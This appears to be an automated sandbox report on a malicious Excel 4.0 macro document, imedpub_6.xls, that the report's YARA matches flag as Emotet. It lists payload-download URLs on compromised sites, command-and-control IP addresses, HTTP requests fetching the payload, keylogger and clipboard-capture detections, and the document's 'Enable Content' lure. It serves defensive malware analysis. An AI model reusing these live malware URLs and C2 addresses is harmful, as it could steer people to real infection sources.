Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: mshta.exe, 00000004.00000003.419178772.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434882434.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435386261.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433698819.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435368888.0000000003C92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433744661.0000000003C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419492395.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/
Source: rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168/3
Source: rundll32.exe, 0000000F.00000002.673084051.000000000057A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.102.168:80/SoFzpWBFIEFVoCFQgg
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm Jump to behavior
Source: unknown DNS traffic detected: queries for: hostfeeling.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: unknown TCP traffic detected without corresponding DNS query: 160.16.102.168
Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com\<4& equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.435343399.0000000003C64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Potential key logger detected (key state polling based)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Emotet
Source: Yara match File source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED

System Summary
barindex
Found malicious Excel 4.0 Macro
Source: imedpub_6.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Source: imedpub_6.xls Macro extractor: Sheet: REEEEEEEE contains: mshta
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 C
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
Source: Screenshot number: 4 Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 Ci [.I 23 24 25 26
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains OLE streams with names of living off the land binaries
Source: imedpub_6.xls Stream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1.......6........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.......<........<..C.a.l.i.b.r.i.1.......>........<..C.a.l.i.b.r.i.1.......?........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1.......4........<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..A.r.i.a.l...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. 